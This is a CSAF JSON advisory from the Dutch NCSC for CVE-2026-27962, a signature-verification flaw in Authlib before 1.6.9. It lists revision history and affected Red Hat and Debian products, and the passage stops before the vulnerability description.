{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-27962",
        "tracking": {
            "current_release_date": "2026-03-25T02:32:55.226386Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-27962",
            "initial_release_date": "2026-03-16T16:03:33.637948Z",
            "revision_history": [
                {
                    "date": "2026-03-16T16:03:33.637948Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-16T16:03:42.721096Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-16T18:28:21.287122Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-16T18:28:23.931952Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T18:38:34.671263Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-16T18:38:40.002401Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-16T19:38:53.731066Z",
                    "number": "7",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-16T22:50:59.086705Z",
                    "number": "8",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-17T00:28:03.810849Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (30).| Product Identifiers created (5).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-17T00:28:18.148691Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T00:44:04.817151Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Products connected (2)."
                },
                {
                    "date": "2026-03-17T00:44:14.722759Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T04:38:39.519409Z",
                    "number": "13",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-17T06:43:41.478488Z",
                    "number": "14",
                    "summary": "Description created for source."
                },
                {
                    "date": "2026-03-17T07:35:17.587694Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T13:38:48.687406Z",
                    "number": "16",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-17T15:04:52.419994Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-17T15:04:59.802602Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-17T21:28:19.667767Z",
                    "number": "19",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-17T21:28:21.794558Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T00:36:49.308150Z",
                    "number": "21",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (24).| Product Identifiers removed (24).| References created (21).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T00:36:54.259982Z",
                    "number": "22",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:28:34.144064Z",
                    "number": "23",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T09:39:17.966612Z",
                    "number": "24",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:39:20.686506Z",
                    "number": "25",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T00:31:34.421998Z",
                    "number": "26",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (18).| Product Identifiers removed (18).| References created (21).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "26"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.6.9",
                                "product": {
                                    "name": "vers:unknown/<1.6.9",
                                    "product_id": "CSAFPID-5830119",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Authlib"
                    }
                ],
                "category": "vendor",
                "name": "Authlib"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-5474797",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:lightspeed_core"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441200",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:quay:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Quay 3"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/3.10",
                                        "product": {
                                            "name": "vers:rpm/3.10",
                                            "product_id": "CSAFPID-5209636",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:quay:3.10::el8"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Red Hat Quay 3.1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/3.12",
                                        "product": {
                                            "name": "vers:rpm/3.12",
                                            "product_id": "CSAFPID-5256659",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:quay:3.12::el8"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Red Hat Quay 3.12"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772054192",
                                        "product": {
                                            "name": "vers:oci/1772054192",
                                            "product_id": "CSAFPID-5846431",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/clair-rhel8@sha256%3Ad547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054192"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772725047",
                                        "product": {
                                            "name": "vers:oci/1772725047",
                                            "product_id": "CSAFPID-5903533",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x&repository_url=registry.redhat.io/quay&tag=1772725047"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "clair-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773765999",
                                        "product": {
                                            "name": "vers:oci/1773765999",
                                            "product_id": "CSAFPID-5846432",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765999"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774022278",
                                        "product": {
                                            "name": "vers:oci/1774022278",
                                            "product_id": "CSAFPID-5903534",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022278"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-bridge-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773765477",
                                        "product": {
                                            "name": "vers:oci/1773765477",
                                            "product_id": "CSAFPID-5846433",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Af15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773765477"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774021704",
                                        "product": {
                                            "name": "vers:oci/1774021704",
                                            "product_id": "CSAFPID-5903535",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021704"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-bridge-operator-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772132933",
                                        "product": {
                                            "name": "vers:oci/1772132933",
                                            "product_id": "CSAFPID-5846434",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3Ac3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772132933"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772739218",
                                        "product": {
                                            "name": "vers:oci/1772739218",
                                            "product_id": "CSAFPID-5903536",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64&repository_url=registry.redhat.io/quay&tag=1772739218"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-builder-qemu-rhcos-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772054202",
                                        "product": {
                                            "name": "vers:oci/1772054202",
                                            "product_id": "CSAFPID-5846435",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-rhel8@sha256%3A821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772054202"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1772726823",
                                        "product": {
                                            "name": "vers:oci/1772726823",
                                            "product_id": "CSAFPID-5903537",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1772726823"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-builder-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773766026",
                                        "product": {
                                            "name": "vers:oci/1773766026",
                                            "product_id": "CSAFPID-5846436",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773766026"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774022275",
                                        "product": {
                                            "name": "vers:oci/1774022275",
                                            "product_id": "CSAFPID-5903538",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022275"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-container-security-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773765467",
                                        "product": {
                                            "name": "vers:oci/1773765467",
                                            "product_id": "CSAFPID-5846437",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aa5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773765467"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774021695",
                                        "product": {
                                            "name": "vers:oci/1774021695",
                                            "product_id": "CSAFPID-5903539",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x&repository_url=registry.redhat.io/quay&tag=1774021695"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-container-security-operator-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773775889",
                                        "product": {
                                            "name": "vers:oci/1773775889",
                                            "product_id": "CSAFPID-5846438",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-bundle@sha256%3Af4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773775889"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774022285",
                                        "product": {
                                            "name": "vers:oci/1774022285",
                                            "product_id": "CSAFPID-5903540",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774022285"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773761676",
                                        "product": {
                                            "name": "vers:oci/1773761676",
                                            "product_id": "CSAFPID-5846439",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-rhel8@sha256%3Add1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1?arch=arm64&repository_url=registry.redhat.io/quay&tag=1773761676"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774021722",
                                        "product": {
                                            "name": "vers:oci/1774021722",
                                            "product_id": "CSAFPID-5903541",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774021722"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-operator-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773771962",
                                        "product": {
                                            "name": "vers:oci/1773771962",
                                            "product_id": "CSAFPID-5846430",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-rhel8@sha256%3Ae39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773771962"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1773971077",
                                        "product": {
                                            "name": "vers:oci/1773971077",
                                            "product_id": "CSAFPID-5903532",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773971077"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/6",
                                "product": {
                                    "name": "vers:rpm/6",
                                    "product_id": "CSAFPID-1439313",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:satellite:6"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222639"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "foreman-mcp-server-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Satellite 6"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2831634"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5035448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-chatbot-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5474798"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "lightspeed-stack-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Lightspeed Core"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5811359"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-mlflow-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068100"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068103"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-minimal-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068105"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222767"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068108"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-pytorch-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068110"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-tensorflow-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5155537"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-pipeline-runtime-tensorflow-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068114"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-codeserver-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068116"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-datascience-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068119"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-cpu-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068121"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068123"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-minimal-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068126"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222780"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-llmcompressor-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068128"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-pytorch-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068131"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-tensorflow-cuda-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5155538"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-tensorflow-rocm-py312-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5068134"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-workbench-jupyter-trustyai-cpu-py312-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455906"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5355695"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay 3"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1405217"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-authlib"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/unknown",
                                        "product": {
                                            "name": "vers:deb/unknown",
                                            "product_id": "CSAFPID-1405218"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "python-authlib"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-27962",
            "cwe": {
                "id": "CWE-347",
                "name": "Improper Verification of Cryptographic Signature"
            },
            "flags": [
                {
                    "label": "vulnerable_code_not_present",
                    "product_ids": [
                        "CSAFPID-5846431",
                        "CSAFPID-5846432",
                        "CSAFPID-5846433",
                        "CSAFPID-5846434",
                        "CSAFPID-5846435",
                        "CSAFPID-5846436",
                        "CSAFPID-5846437",
                        "CSAFPID-5846438",
                        "CSAFPID-5846439",
                        "CSAFPID-5903533",
                        "CSAFPID-5903534",
                        "CSAFPID-5903535",
                        "CSAFPID-5903536",
                        "CSAFPID-5903537",
                        "CSAFPID-5903538",
                        "CSAFPID-5903539",
                        "CSAFPID-5903540",
                        "CSAFPID-5903541"
                    ]
                }
            ],
            "notes": [
                {
                    "category": "description",
